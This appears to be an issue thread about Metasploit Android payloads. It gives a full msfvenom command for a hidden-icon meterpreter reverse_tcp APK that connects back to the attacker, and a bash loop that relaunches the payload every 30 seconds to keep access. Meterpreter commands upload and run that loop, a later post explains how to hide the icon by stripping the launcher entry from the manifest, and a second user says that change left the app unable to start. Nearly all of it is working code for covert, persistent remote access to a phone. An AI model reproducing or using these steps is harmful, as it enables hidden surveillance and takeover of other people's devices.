Running the apk permanent access script when the payload is hidden

[mahyarkermani]

Hi guys, this question has been asked many times in the metasploit issues but no solution has been provided for it, so I am asking this question again. I made a simple payload for Android with the following command. The desired payload is hidden after installation: msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.40 lport=5656 -a dalvik --platform android AndroidHideAppIcon=true -o payload.apk

Then I upload a small script to create permanent access to the target:

#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 30
done

# script.sh

And then with the following commands, I upload and run this script in the target:

cd /sdcard
upload script.sh
shell
sh script.sh

and after running the script, I get the following error

Error type 3
Error: Activity class {com.metasploit.stage/com.metasploit.stage.MainActivity} does not exist.

The reason for this error is that the apk file is hidden from the user's device with the AndroidHideAppIcon=true command. If the payload is installed normally and its icon is not hidden (don't run the AndroidHideAppIcon=true command), the script will work well. Actually, the problem is due to the non-recognition of routes in the am command ( in script.sh ).

Tested device

I did all this on Kali Linux 2022 with the latest metasploit update and related tools. Also, the target Android device is my Samsung Android 8

Conclusion

This does not seem to be a problem or a bug from Metasploit (in some issues, people mentioned a bug in Metasploit). In my opinion, the main idea is that the am tool ( Activity manager ) in the script cannot correctly identify parameters or different paths and finally execute the hidden apk. Please, if you have any ideas, comments or solutions, post them in this issue, so that we can solve this problem once and for all. Thank you.

[mahyarkermani]

Even when we execute app_run com.metasploit.stage command directly from meterpreter, we get the following error: com.metasploit.stage Not Found

In fact, this command is responsible for running programs from meterpreter (using the package name), but when apk is hidden, this command cannot run the program (of course, this is normal, I meant that it is most likely the problem from implementing parameters and finding apk paths). Considering that the package name is in the app_list command.

[mahyarkermani]

holy shit. Yes, Yes. I found the solution. I don't know how it works when we use hide_app_icon command in Metasploit. Apparently, it hides the activity class MainActivity part and makes our script unable to find and execute it. It's not a good idea to hide the app. You can decompile your apk file, then remove the <category android:name="android.intent.category.LAUNCHER" /> line in the AndroidManifest.xml file. This will make the program not disappear from the device's default launcher (in fact, the program icon will not appear on the user's menu) and in addition, no additional changes will be applied to the payload. Then you can execute the payload through the desired script.

[ChillVibesMushroom]

holy shit. Yes, Yes. I found the solution. I don't know how it works when we use hide_app_icon command in Metasploit. Apparently, it hides the activity class MainActivity part and makes our script unable to find and execute it. It's not a good idea to hide the app. You can decompile your apk file, then remove the <category android:name="android.intent.category.LAUNCHER" /> line in the AndroidManifest.xml file. This will make the program not disappear from the device's default launcher (in fact, the program icon will not appear on the user's menu) and in addition, no additional changes will be applied to the payload. Then you can execute the payload through the desired script.

I did what you said in the AndroidManifest.xml and deleted the launcher category but now I can't open the app is this supposed to be in the AndroidManifest.xml outside of the the original folder or the one inside the original folder after apktool d apk.apk I did manage to get the app taken off of the home screen and app drawer but again it won't open.

[ChillVibesMushroom]

I'm saying I delete this category android:name="android.intent.category.LAUNCHER and when I recompile and install the app the app won't open or run main activity